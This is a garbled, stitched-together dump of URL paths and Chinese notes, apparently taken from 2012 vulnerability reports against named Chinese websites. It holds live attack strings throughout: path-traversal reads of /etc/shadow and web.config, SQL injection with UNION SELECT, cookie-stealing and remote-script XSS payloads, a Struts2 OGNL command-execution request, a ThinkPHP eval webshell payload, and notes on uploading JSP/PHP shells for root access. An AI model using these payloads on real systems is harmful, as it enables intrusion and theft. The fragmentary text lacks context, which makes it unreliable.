/xService/Index.php?id=7 /AboutUs/NewsListByType.php?tid=1 /Other/ClientList.php?tid=1 /main/down.jsp页面对filePath参数没有任何过滤导致任意文件下载漏洞 /main/down.jsp?filePath=/../../../../../../../../../../../../../../../etc/shadow&fileName=1.txt 591wed.com /miao/ready.php?id=62 /Tuangou/index.php?id=91 /Tuangou/index.php?id=91 /Tuangou/index.php?id=91 /company_price.php?companyID=1451&id=11917 /company_price.php?companyID=1451&id=11917 /company_price.php?companyID=1451&id=11917 /discount/bridal_veil_cont.php?id=8 /discount/bridal_veil_cont.php?id=8 /discount/bridal_veil_cont.php?id=8 /bbs_activity/sh_100902_2.php?act=v&id=22 /bbs_activity/sh_100902_2.php?act=v&id=22 /bbs_activity/sh_100902_2.php?act=v&id=22 /type_14.html /1.txt /phpmyadmin/ /xampp/phpinfo.php discovery.baidu.com/down_bizi2.php?thumb=/program.php /WebAdmin/NewsDetail.php?ID_News=4468 /WebAdmin/NewsDetail.php?ID_News=4468 /WebAdmin /Service/OrderToolBarService.aspx?callback=jsonp1351970015502&_=1351970046200&action=CancelOrder&orderid=366350744&Key=E8A9EC9F490C2AF1C2F159D74CF9904D /programs/view/zfkZlYZByHI/ /i/control/order-cancelled?orderId=1351971788631 /ysmp_08xuyu/message_ajax.php /zhaoqing/bbs/ / 0898.net分域名都有SQL漏洞。 /cgi-bin/user/bbs_show_my_msg?search_class=4&Ptype=a&uin=149245802&search_value=d%25%22%20and%20version()%3E4%23 /cgi-bin/user/bbs_show_my_msg?search_class=4&Ptype=a&uin=149245802&search_value=d%25%22%20and%20version()%3E3%23 /online/getunreadnum.php?func=callback /online/getunreadnum.php?func=callback /index.html /uploadServer/jsp/debug.jsp /wdfportalCache/debug.jsp /wdfportalCache/ora.jsp /LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=friends%27%20and%20%271%27=%271 www.siteserver.com没有 /oauth/access_token /index.php?id=xAuth%E6%96%87%E6%A1%A3 /oauth/access_token /articles/web/5984.html找到的相关向量 /myspace/test /index.php?m=festival&type=451'&cityid=29 /MemberTrade/cancelOrder?orderSn=121105411598&cancel_reason=%E6%94%AF%E4%BB%98%E4%B8%8D%E6%88%90%E5%8A%9F /uploadServer/index.do /wap/?a=header&from=&h=5&t=x&mcid=10 /wap/?m=Soft&t=x&mid=103&stid=13 /index.php?c=android&a=android_info&act=m&pname=1401 /admin/index.php/Public/login /m/fckeditor/editor/fckeditor.html /?c=android&act=--%3E%27%22%3E%3Cscript%3Ealert%28/seay/%29%3C/script%3E gmail.com/6052077@qq.com / 82**17/stone**shi/ /wap/?a=header&from=&h=5&t=x&mcid=10 10.147.% /index.php?c=android&a=android_info&act=m&pname=1401 10.147.19.237 /fcgi-bin/webinvite?cmd=get_group&appid=10001&callback=qq_friends /fcgi-bin/webinvite?cmd=get_group&appid=10001&callback=qq_friends /tv/center/orderForward.jsp?orderId=1959130&updateOrder=2 /j/app/login /jcc/outside/noLoginAction.do?action=elisorPublicList&queryOrgId=-1 /jcc/outside/noLoginAction.do?action=mediatePublicList&queryOrgId=-1 /loadxml.asmx可读任意xml。 /loginAction!initChange.action /showFeedback /showFeedback?suid=1210151115372890 /prog/wapsite/sso/login_submit.php url(#default#AnchorClick) alert(1) /editor/filemanager/upload/test.html /ft/product.fb,我这里只测试了网易云阅读: /index.php?id=15881%A1%AF&from_id=40951没有做任何sql过滤导致sql注入漏洞,电商的安全性应该要求更高些吧。 /tv/center/orderForward.jsp?orderId=1959130&updateOrder=2 /onlineusers/0/ /getOnlineNum www.tongrentangtcm.com /leifeng/admin/ /leifeng/admin/content_list.jsp?title_id=117 /grouppic/2012/11/07/1352275320Prqpi_big.jpg /grouppic/2012/11/07/1352275320Prqpi.jpg /cgi-bin/local/news.cgi?cat=480 /admin/default.aspx /x.js seo.chinaz.com/?host=unbet8.com%2f% /meta/#url=unbet8.com/0.htm /meta/ret/01370d996e987723/ /Tools/MetaCheck.aspx?url=unbet8.com%2F% / /admin/ /webim/vote_pc.php /index.do /swordcms/platform/components/fckeditor/editor/plugins/upload/upload.jsp即可直接上传jsp木马,获取的jsp木马路径为:http://www.hbcss.gov.cn/swordcms/uploadfiles/root.jsp。因为是jsp架构故webshell权限多为system或者root权限,可成功拿下系统权限。 /user_info.php?action=my_order&do=order_amount_current_month¤t_mon=03&random=0.7064526792839925×tamp=1352368141820¤t_year=2012 / / / /login.php?action=submit /login.php?action=submit /index.php?c=default&a=content&p=1&ic_id=76&id=161 ypk.xywy.com admin /38jie.php /Display.aspx?Type=notice&ID=163 /plus/hdview.php?aid=52216 /wzsp/login.aspx(可绕过,但不是admin权限) /wzsp/ /ued/ / /member/forgetpwd /forgotpassword.jhtml /login/login.aspx?http://www.vjia.com/ / /login/login.aspx?https://www.vjia.com/ /PublicControls/NewValidateCode.aspx?height=25&width=93&codeLen=0&photoType=0&t={时间戳,可忽略 regForm.submit() /partner_renrenOauthCallback_wintype_?code=nOxfokUeUu42WuKlYz1hJOT4xWPimrad /qxjweb/zxft/qw.jsp?id=36156 /cqds/ /assetmanager/startPage.jsp /assetmanager/startPage.jsp /zfxxgk/ /ckfinder/ckfinder.html /fcgi-bin/webpet?cmd=query&flag=0&callback=getmeizi /cgi-bin/v1.0/extern/cgi_official_website.cgi /cgi-bin/qqgame_get_relation?type=1&callback=getmeizi /eduDedicatedDomainName.do / /chs/index.html这个页面 /index.php?m=order&act=view&orderid=4645663 /checkvalidcode / /Login.aspx /login.aspx /iframe_brief.php?style_id=103560295 www.jiayuan.com /login/validate.php /User/RetrieveStep1 /contact/contactfillinverifycode.aspx?method=GetPwdByPhone&code=53750b5150827ddebc7b05c558e48905&cellphonenum=1*********9&no=7144 /app/web/include/include.tar.gz /app/web/config.php.1 www.yytingting.com出品的Android有声读物软件“懒人听书”,在自动更新时没有数字签名,也没有任何认证,如果被arp欺骗,或者DNS劫持等,可被利用来替换成其他apk,最终可能达到远程代码执行的后果。 /index.php /n_wlan/admin/login.php?action=login /xueyebing/jixingbaixuebing/ /cardmg/,post型sql注入。注入的话可以获取到兑换卷的号码和密码信息。直接在这个上面填写卷号和密码即可兑换大闸蟹,其中发现兑换券大部分未使用,金额大概在万元左右。涉及到资金问题,认为还是比较严重的问题了。 /main/usermessage?id=0&htmlmark=2&delmark=1,可以免admin登录查看通话记录,查询,下载,删除通话录音文件。不少政府机关,学校,公司很多都采用SOC1800用于电话录音,危害不小。 /试了试找回密码的功能,瞎狗眼啊瞎狗眼!!!!! /index.html?email=imlonghao@gmail.com&showWindowFlag=1 /,找到【登录】按钮进入登录页面,看到灰色的【忘记密码?】链接没有,点它: /assetmanager/HTMLEditor/insertflash.jsp直接上传jspshell /vc/ /common/modules/survey/survey_submit.php?s_id=27750 /2pdf/down.aspx?fn=/down/2012/11/xx/xx/xxx.pdf /2pdf/down.aspx?fn=down.aspx /2pdf/down.aspx?fn=../web.config /2pdf/down.aspx?fn=upload.aspx /2pdf/down.aspx?fn=upload.aspx.cs /2pdf/down.aspx?fn=down.aspx.cs /2pdf/down.aspx?fn=../ToPDF.aspx /2pdf/down.aspx?fn=../ToPDF.aspx.cs /",function /。 /jifen。积分栏目排行榜可以看到用户完整的邮箱,基本可以根据前面提示的用户名前三位猜测到密码,进而通过密码修改漏洞,进而获取用户信息,修改资料,提取用户积分为人民币,通过前几位的排行榜可以看到,至少可以获利10万以上。 /uc_v1.php?id=7 /bj/reghouse.php /cms/ /api/getreplay.php?order=1&page=1&sport_type=0&type=getallyuezhan&week=0&_=1352445400451&city=11 /login_login.action /getProductDetail.action?software_id=08ef5507-d870-45f3-92f3-b4cab5ec2f7d /main.php?do=user_change_email&flag=edit /main.php?do=user_activate_ajax&flag=email&email=攻击者的邮箱&mark=1&type=1 /bug.php?action=view&id=6052 /usercp/article_edit.php /user/resetpassword.php?user=********&email=**********%40163.com&salt=eb5f16&u=&c= /leagueimg/092.gif/.php /zcfg_detail.php?id=345 /jact/front/front_main.action /zjlawyermanager/view/home/Home/index/index.do zc.qq.com/chs/index.html /api/info/infolisttemplate/bj/hezu/0/50?pic=1 http://api.wap.58.com/api/info/infoview/bj/isall/AADD95C12189A537CC07A74ECFAD8B5F/?pic=1 /api/user/deleteinfo/?userid=3130393236333139383139303134&infoids=83C0A6A1F3506173E3D628DC6BA6CEC7 /app/blog/detail/4206?mid=41632 /usr/local/java/jre/lib/i386:/usr/local/java/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib / /ptebook/book.php?bookcode=1452 /weiboshare/?id=180183 /news_details.asp /newslist.php?cid=22 /fckeditor/editor/filemanager/connectors/uploadtest.html /fckeditor/editor/filemanager/connectors/test.html /index.php/user/lookpass /RegfindPassword.action?email=邮箱&loginName=用户名 /search/search.ydd?keyword=%3CScRipt%3Ealert%28%22xss%22%29%3C%2FScRipt%3E&t=blog /user/space/alltalk/?type=s /shop/hrexchange/room/1120199/?cid=1004_786251 /ajax/resume/show/?view=0&id=AAAAAAA&r=BBBBB /main/phonereg.jsp /showcontent.php?type=news&did=1305 /showcontent.php?type=news&did=1305 /showcontent.php?type=news&did=1305 SQL注入,是程序员都应该知道。。这我就不描述了。 20px;float:none;width:40px /index.php/crowdtest/file/showImage/fileid/103323 expression(alert('test')) /index.php/crowdtest/post/showPost/postId/2128/pageNum/0 /website/mu04.jsp?uid=754 /upload/default/20121115/upload_122408.php /index1.php?id=34 /login.php一个投票系统,居然还存在访问控制绕过。。好吧~啥都不说了~ alert(0);void(0) /maldives/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /reviews.jsp?movId=145176 /editor/filemanager/upload/asp/upload.asp即可上传任意文件。这个是很早以前的fckeditor /cgi-bin/content_new?tid=13315465628034261&num=10&order=0&fid=674.js alert(window.name) /q2VPC 274px;background-color:#abaca7 274px;background-color:#e7effc;border:5px 15px;width:315px /save.php /google.png 5px / /lvword/ApplyDel.asp?user=100eGuest&Delete=1 /1.js jQuery.getScript(String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,106,115)) /sjtxxgk/fhome.action /scjs/adsearch.action t.qq.com/messages/inbox#pmtid= /wap/data/admin/ver.txt /wap/back/data/admin/ver.txt /memberManager.action /Service/ContactService.ashx?Method=EmailGetPwdResetPwd /Service/ContactService.ashx?Method=EmailGetPwdResetPwd /info/Arcitle_Show_Ac_world.asp?BigClassName=%B4%F3%C7%A7%CA%C0%BD%E7&BigClassID=1+and+1=1 /preuid.php?uid=2610023800 /interface/question_elite.php?sub=318&sub_pid=315 /peerpaycore/confirmPeerPayResult.htm?applyId=20121116146677759#)中的applyId可以遍历到当天的信息。 /apps/blog/index.php?s=/Index/addBlog /SUSF/sy!query /?ch=warm.invite.url&fuin=10005 /feedback.html /zaePDI?1353141891 /whitehats/%E8%93%9D%E9%A3%8E /poigame /AigoWebsite/news/show.asp?nid=159 /new_geyao_new.aspx?id=24 /admin/ /data/data.mdb /admin/ /gzwnrgl/nrglIndex.action?catalogID=11&type=3 /investigate/communion.action?communionType=1 /ebook/search.jhtml?sw= /manage/left.asp /manage/articleguanli/grhymm.asp /Index/zhshow2?id=13 /zone/"+uid+"/editUserInfo.action /admin和http://119.254.xx.xx/admin,头一个网站泄露了数据名。 /admin/ /upload/ www.250y.com存在S2漏洞,root权限。 /tags.php?/%D0%D0%D2%B5%D7%CA%D1%B6 /tags.php?tag=/%D0%D0%D2%B5%D7%CA%D1%B6 /tags.php?tag=/%D0%D0%D2%B5%D7%CA%D1%B6 /v2/iframe/safe/email/active.shtml?pkey=undefined&email=13045558888@qq.com none alert(document.cookie) /display.action /cms/sql/cms_login.sql /phpclient/cms/login.php /admin.php /special/20100719085540/admin/index.php /special/20100719085540/admin/index.php?todo=articleForm&act=articleEdit&id=68 /epanelweb/client/donatehistory/donatPoint.htm?random=121212&point=-1000&donateId=1168 /campus/video?vid=42&userid=7322865 /campus/video?vid=42&userid=7322865-version() /campus/video?vid=42&userid=7322865-versionn() /rsgzgl_site/login.asp /.bash_history http://www.sudu.cn/domain/templete.php?action=modify&cid=461194 integer Mysql /mianshi//info/content.php?menu_id=3&interview_id=7245 /mianshi//info/content.php?menu_id=3&interview_id=7245%20and%201=2%20union%20select%201,admin_type,3,4,5,6,7,8,9,10,11%20FROM%20met_admin_table%20limit%201,1 / /editpost.aspx?topicid=9195391&postid=11807724 /info/fileinfo.aspx?fileID=6659924 16.0 /info/fileinfo.aspx?fileID=6659924 /extmail/cgi/index.cgi /extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi //extman/cgi/signup.cgi?domain=%3Cscript%3Ealert%28document.cookie%29%3C/script%3 //extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi /index.html /flash_upload.php?modelid=-1 /rkit /300215/3881309/ /page/html/?1.html /chinamobile/db/payment.sql /inc/onclickadd.asp?idname=教育频道 /forum.php /v/search/123 / /v/getchat /v/chat,可见即可,在访问http://wan.360.cn/v/getchat /data/misc/wifi /admin/left.aspx /Admin/sqlPlatform/operateSql.aspx /Admin/sqlPlatform/sqlLogin.aspx /index.php?m=Public&a=login //sso.boyaa.com/从而暴露各种后台。 /phpmyadmin/index.php还有个这个。 /#!app=100626394 /#!app=100626394%22%3E&url=http%3A%2F%2Fappstore.qzone.qq.com%2Fcgi-bin%2Fqzapps%2Fqz_appstore_app_lite_v3.cgi%3Fappid%3D100626394%26uin%3D114967639%26pfid%3D2%26qz_ver%3D6%26appcanvas%3D0%26qz_style%3Dv6%2F31%26params%3D%26canvastype%3D%26via%3DQZ.HashRefresh /#!app=100626394 /cgi-bin/qzapps/qz_appstore_app_lite_v3.cgi?appid=100626394&uin=114967639&pfid=2&qz_ver=6&appcanvas=0&qz_style=v6/31¶ms=&canvastype=&via=QZ.HashRefresh alert(1) /ndvs/auto_login.asp?user=user&PWD=3E30A217E9E1C596D2C8FF53788DB915&nettype=0 biz.go.cn/index.php/biz/down?gid=813 biz.go.cn/index.php/biz/down?gid=1333 /login/Jeecms.do /web.rar /queryNoticetoindex.action /taobaomanage/ /initPage.do?method=initPage / /left.PHP /top.php /business/ /business/table.php /huodongye.php?pn=zucefangsi /wap/hotel/query.shtml /manage/ /gv /gv 100% 100%;z-index:10;position:absolute 0px 0px /xss-test/renren/test.js /gv /cn2/findpsw/mobile_web_find_input_account / /Admin/ cs:122 /Npcs.aspx?cid=&lid=&tid=&minlevel=&maxlevel=&zid=&aid=&name=1(sqlinjection /manager/login.aspx /admin.php /admin/login.aspx /comment2/admin/login.htm / /Login.aspx 83” /admin/login.aspx /home.action /web?query=inurl%3A%3Cscript%3E&_asf=www.sogou.com&_ast=1353643719&w=01019900&p=40040100&sut=2354&sst0=1353643719001 /fh/ks_list.aspx?ks=%C4%D0%BF%C6&ty=anli /login.aspx / /admin/privilege.php?act=login alert(document.cookie) /ZJ_XLY_KJWebApp/JJ_Index.aspx /group/posts/38/members/index.php?wd=123'%20and%20 /test2_gm_server/WEB-INF/classes/conf/db1/test2_db.xml /test2_gm_server/WEB-INF/classes/conf/db_gm/gm_db.xml /phpinfo.php /test.php /test.html /account/address / /fbrole/main/loginframe/login_cert.jsp /1.txt /main.php?do=tourist_template_edit&id=987682&i=1&edit_type=1 /main.php?do=tourist_template_ajax&flag=delete&id=987682 /main.php?do=pay_user_template_edit&id=155745&i=1&edit_type=1 /main.php?do=pay_use_template_ajax&flag=delete&id=155745 /developer/cn/newsshow.php?id=507 /gex/loginAction_gotoLogin.action /blog/admin/ house365.com txt|doc|xls /1190902/blog /1190902/gbook /1190902/photo /q/roofsec /index/vote/268 gov.cn mail /xlyshsystem/login.aspx admin:123456 / /ajaxuser.php?type=blog&action=atcblogclass&job=add /my/feeds /zfcg/show.aspx?rid=20120615171517 /system_dntb/upload/temp.asp /authtest.php?id=Ayuk1y&info=Please+Login+In++@360.cn desFolder=server.mappath("../pic") www.eastday.com /admin /images/website/logo.gif /PicNews.aspx?id=30 / /Finger /Finger /Finger /Finger /user/contactShowModify.jspx?memberId=8679 /chezhan/chengdushi/chengdushi13994.html www.chinawest.gov.cn shop/member!passwordRecover.action / /zt.php?tid=390 /cms/getclick.do存在struts2漏洞 /login/login.php?module=login&opt=login&subopt=begin /WWaterV020/WWater/WWater.WebUI.RMC/Video/HCNetVideoIndex.aspx /WWaterV020/WWater/WWater.WebUI.RMC/Video/CodeBase/setup.rar /WWaterV020/WWater/WWater.WebUI.RMC/Video/CodeBase/%e8%a7%86%e9%a2%91%e7%9b%91%e6%8e%a7.rar /ajax/message/send.php /index.php?type=jbsz&op=password,为修改自己的账号密码。 http://my.zol.com/ajax/personal/password.php?type=jbsz&op=password&action=modify&password_old=sdfgadfgas&password_new=nihaoa&password_new2=nihaoa&15:3:53:102&15:3:53:138 /index.shtml /mbloghead/7d0a4feda705e41130f6/120 /Finger www.china-cdt.com www.china-cdt.com / oeeee.com /fh/nk_list.aspx?id=%C4%D0%BF%C6&type=remen /fh/nk_list.aspx?id=%C4%D0%BF%C6&type=remen /fh/nk_list.aspx?id=%C4%D0%BF%C6&type=remen /fh/ks_detail.aspx?id=7367 /fh/ks_detail.aspx?id=7367 /fh/ks_detail.aspx?id=7367 /dsmmp/showList.action?struts&(a)(('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(z))&(b)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(z))&(c)(('\u0023_memberAccess.excludeProperties\u003d{}')(z))&(d)(('\u0023a_cmd\u003d\'\143\141\164\40\57\145\164\143\57\160\141\163\163\167\144\'')(z))&(e)(('\u0023a_array\u003dnew\40java.lang.String[3]')(z))&(f)(('\u0023a_array[0]\u003d\'/bin/bash\'')(z))&(g)(('\u0023a_array[1]\u003d\'-c\'')(z))&(h)(('\u0023a_array[2]\u003d\u0023a_cmd')(z))&(i) /Project/ViewCode/pid/xxx pwd user txt www.ibevision.com oeeee.com /index.php?m=Vote&a=content&uid=1011&id=156 /tuijian/viewnew.aspx?id=230 /tuijian/view.aspx?id=82 /wenmessage/ListWenMessage.aspx?type=%C8%C4%B8%BB%CD%A8 /tuijian/view.aspx?id=82 /tuijian/view.aspx?id=82 /Api/channel.php?s=/index/search/?s=/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D wenzhou.house.sina.com.cn/ht/,由于是手机党,我这没办法截图,附上网页文字看看吧 history.go(-1) /index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /portal/common/index_board_detail.do?boardId=281 /news/detail/index.php?id=-1 /apps/actwrite/index.php/Index/content/id/640698 /apps/actwrite/index.php/Index/content/id/640698 /console/ /de/member/reg_new.php / / / / / /show.php?cid=7&id=115 /admin/admin_main.php /InvoiceQuery/login.action /login.html /feedback.php /suggest/ function(){var 9149F99D-BC22-49c9-B952-845C94707595 /ZingPlayWA.cab#version=1,0,0,8 function(){if function(){},init function() function() false;if /?/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C /account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg /account/register/user_name-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg /index.php?r=detail&id=24009 /core/login /.svn/entries /viewEnterprise!main.action?id=52 / /admin/.svn/entries /coopinter/trunck/web/admin /coopinter /admin/.svn/text-base/addadmin.jsp.svn-base /article/search.php?ver=iphone&tag=%E6%90%AD%E9%85%8D /tryapply/?tryid= /products/show/33880?score[27]=&score[20]=&score[7]=&score[35]=&pf_ycall=&ptypecode=010402&pid=33880&bid=549&issubprice=0&csid= /products/show/36104?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=36104&bid=707&issubprice=0&csid= /article/search.php?ver=iphone&tag= /products/show/32817?score[50]=&score[51]=&score[52]=&score[7]=&score[1]=&pf_ycall=&ptypecode=010602&pid=32817&bid=718&issubprice=0&csid= /products/show/37269?score[2]=&score[6]=&score[5]=&score[4]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010107&pid=37269&bid=671&issubprice=0&csid= /products/show/9155?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=9155&bid=694&issubprice=0&csid= /products/show/33629?score[38]=&score[36]=&score[37]=&score[7]=&pf_ycall=&ptypecode=010120&pid=33629&bid=788&issubprice=0&csid= /products/show/34713?score[6]=&score[4]=&score[2]=&score[5]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010108&pid=34713&bid=1216&issubprice=0&csid= /products/show/31930?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=31930&bid=836&issubprice=0&csid= /products/show/34968?score[4]=&score[5]=&score[6]=&score[2]=&score[3]=&score[1]=&score[7]=&pf_ycall=&ptypecode=010115&pid=34968&bid=1216&issubprice=0&csid= /products/show/34995?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=34995&bid=487&issubprice=0&csid= /products/show/33212?score[38]=&score[51]=&score[15]=&score[14]=&score[7]=&pf_ycall=&ptypecode=010118&pid=33212&bid=612&issubprice=0&csid= /products/show/34363?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=34363&bid=597&issubprice=0&csid= /products/show/33527?score[19]=&score[5]=&score[27]=&score[7]=&score[11]=&score[28]=&pf_ycall=&ptypecode=010503&pid=33527&bid=489&issubprice=0&csid= /products/show/33828?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=33828&bid=691&issubprice=0&csid= /products/show/14787?score[39]=&score[4]=&score[6]=&score[1]=&score[40]=&score[7]=&pf_ycall=&ptypecode=010112&pid=14787&bid=811&issubprice=0&csid= /tryapply/?tryid= /hs6/index.jsp /hs6/jsp/transcript.jsp?color=000000&docid=249612 /hs6/ /article/2012/82657.html www.nmggtt.gov.cn /nmgt/cms/web/file_upload.jsp?type=file&fieldname=attachment&viewext=true&table=p_web&category=xf&info=20121201233421806245646 www.nmggtt.gov.cn:83 /zcfg_show.asp?ArticleID=1273 /?url=xxxx&title=xxx&du=&pic=&vid=&tag=&uid=XXX&acl=&su=XXXX{%Inject /ns.asp?nowmenuid=500290&pageno=1&previd=500292&key=%22%3E%3Cscript%3Ealert%2891%29%3C%2Fscript%3E /shop.asp?key=1234%22%3E%3Cscript+%3Ealert%28796%29%3C%2Fscript%3E&previd=500017&nowmenuid=500010&Submit2=%CB%D1%CB%F7 /shop_cart.asp?cc=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&prodid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E&nowmenuid=%3E%22%27%3E%3Cscript%3Ealert%28142%29%3C%2Fscript%3E /shop_order.asp?orderid=500828%27%2Balert%28827%29%2B%27&nowmenuid=500010&tm=500010205251500828 /Login.aspx?returnUrl=/index.aspx /wenda/?/admin/setting/sys_save_ajax/ /wenda/?/admin/setting/type-content /anotice/indexTop.action / /eduwebproduct/ /139/callback.do?clickSysId=13&userAccount=9f317ed76ab54343445074489571662b&rType=0&rUrl=https%3A%2F%2Fpassport.yihaodian.com%2F139%2Fcallback.do&mKey=DF37443453h45F3CDCF0FC6A413EB6DF×tamp=407799950&usertoken=OLPTOKENbfGGGHH61340e1ad0cdd85a99ddfc05 /plus/showgirl/en/index.php?m=Index&a=index&sgid=614 /new/netease/callback.aspx?username=8202378786&ts=20121202205444&sign=4ED3AE3FF504043411743F1A702FC649495CE94CE8078DBACA2D056A21BBE49F5205CEC5DBF08AD089A92FBBE6D7001DF9DAF0FC6ECE9A5A3FC9294CD586A87D9B453D4154AF19F5E2319C115AF8FA487A3D6055AB1351A6184D219931A8B1CE /index.action / / /jmx-console/ /api/mailer.php?action=lar /api/mailer.php?action=sme /php.php /servicesurvey/login.php /qun.php?pos=411&k=\x22\x3E\x3cimg\x2fsrc\x3d1\x20onerror\x3d\x22alert(1)\x22 /qun.php?pos=411&k=\x22\x3E\x3csvg/onload\x3dUI.getScript(\x22//url.cn/7Hdsis\x22) /asyn/getSearchHistory.php获取返回数据之后,会调用 /agent!login.action /485 fixed break-all www.nxgtt.gov.cn /ejforum/index.jsp www.oschina.net的,就输入了该网站的用户名和密码,点击确定以后其实这个密码就发给我了,因为这个钓鱼认证是我搞的,好了看看效果把。 /invoicing/netpage/qiantai/ndetail-2.action /index.action /online/register/registerQuery!queryEmail.ajax system_r:unconfined_t:SystemLow-SystemHigh /InfoShow.asp?kid=2291 /member/login.asp /html/db/portal.action /web!listBusiness.action /?url=http%3A%2F%2Fwww.gzpfyy.org%2F&vt=a&linktext= /s?wd=inurl%3A%2FReadNews.asp%3F&pn=10&ie=utf-8&rsv_page=1 / /addjob/index.php?n=%E5%BB%BA%E7%AD%91%E8%BF%90%E8%A1%8C%E7%BB%B4%E6%8A%A4%E7%AE%A1%E7%90%86%3Cscript%3Ealert%28/xss/%29%3C/script%3E /ogilvy_sys/login.php /profile/ /Community72/13/13/20637355-share-1_x.jpg /点击应用 /tianya_sdk_php/oauth_normal.php /oauth/request_token.php取得request /oauth/authorize.php?oauth_token=XXXX&consumer_key=[APP /oauth/authorize.php?consumer_key=XXXX /oauth/access_token.php /member/login.jhtml /json/show_buyer_list.htm?is_offline=&page_size=15&is_start=false&item_type=b&ends=1352176000000&starts=1351571000000&item_id=19417712520&&user_tag=38866976&old_quantity=56564&sold_total_num=null&closed=false&seller_num_id=(替换你帐号的userid=后的数字)&zhichong=true&taohua=&sbn=&bidPage=1 /share/link?shareid=134784&uk=3173747426 /app点击应用 /t163_php_sdk/index_normal.php /oauth/request_token取得request /oauth/authenticate?oauth_token=XXXXXXX&oauth_callback=XXXXXXX /oauth/authenticate /oauth/access_token / Mozilla/5.0 /phpmyadmin /存在IIS源码泄露及文件类型解析错误漏洞,注册用户后上传包含PHP代码的jpg文件,PHP代码成功执行。在图片中插入生成PHP一句话木马的PHP代码,获得shell。通 /的用户信息,导致信息泄露。 /1.txt和http://wiki.acfun.tv/qq.txt,猜测前面已经有别人拿到过网站的shell了。 /点击应用 /tianya_sdk_php/oauth_normal.php /oauth/request_token.php取得request /oauth/authorize.php?oauth_token=XXXX&consumer_key=XXXX&oauth_callback=XXXX /oauth/authorize.php?consumer_key=XXXX /oauth/access_token.php 13.0 /10039/t/z8h1WseDA /js.js' /KinthFrame /KinthFrame /KinthFrame /ca/ /MichelleV6/webMichelle/logonform.jsp /SmtCCS_manage/login.do?action=input /ca/singlelogin.jsp?originUrl=%2Fapp%2Fmain.jsp /app/main.jsp?ticketId=e659954f-46c4-44c9-91b2-5a1539c114e9&s=84603f0b2436 / /DzywApp/login.jsp /ca /inasweb/ /telant /main.jsp /index.do /admin/protected/index.jsp /mbrweb/jsp/member/member_pwd_forgot.jsp /wap/login.shtml /account/v1/api/sendacodenormal /account/app/create?u=https://wallet.baidu.com/active&refer=slogin FG=1 /webmaster/add#1 /system/login.asp /Upload/4/2012120601200453554.asp /index.php?act=user.orderinfo&id=(订单id)&hotelid=(酒店id)&brandID=1&PHPSESSID=*** /c:\windows\system32\BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB /education和 /?center出的年份输入限制过于简单加上%00能绕过 /?business&un=962216200 /static/tz.php /chs/index.html /admin/ / /ued_blog /jsslt/outitemlist.action?topicid=8abc818b1d56bd4c011d57fd24030042 /dzyl/browseBook.action?query.bookType.id=4028811c1b062cae011b062d11b60011 /index_resume.php?page=1&status=-2&board=22 /点击应用 /friendoc/v3.1/ /oauth/grant?client_id=c6e5f5a7b7754fcbb9b1f3ae41d290ee&redirect_uri=http%3A%2F%2Fwww.friendoc.net%2Ffriendoc%2Fv3.1%2Floading.php&response_type=code&display=iframe&scope=read_user_status+create_album+read_user_album+photo_upload+read_user_photo+read_user_blog+read_user_feed+read_user_guestbook+read_user_comment+send_request+publish_comment+publish_checkin&state=200&origin=0 /oauth/grant /game/index.php?ka=0 /login/findbackPassword_1.jsp找回密码处 /TIPS /TIPS/guest/GuestSignon.jsp none /xss.js'.replace(/!/g,String.fromCharCode(38)) 14px;font-family:arial,verdana,sans-serif /QYZZ/Template0/index.aspx?JGID=10201 /QYZZ/Template0/index.aspx?JGID=595 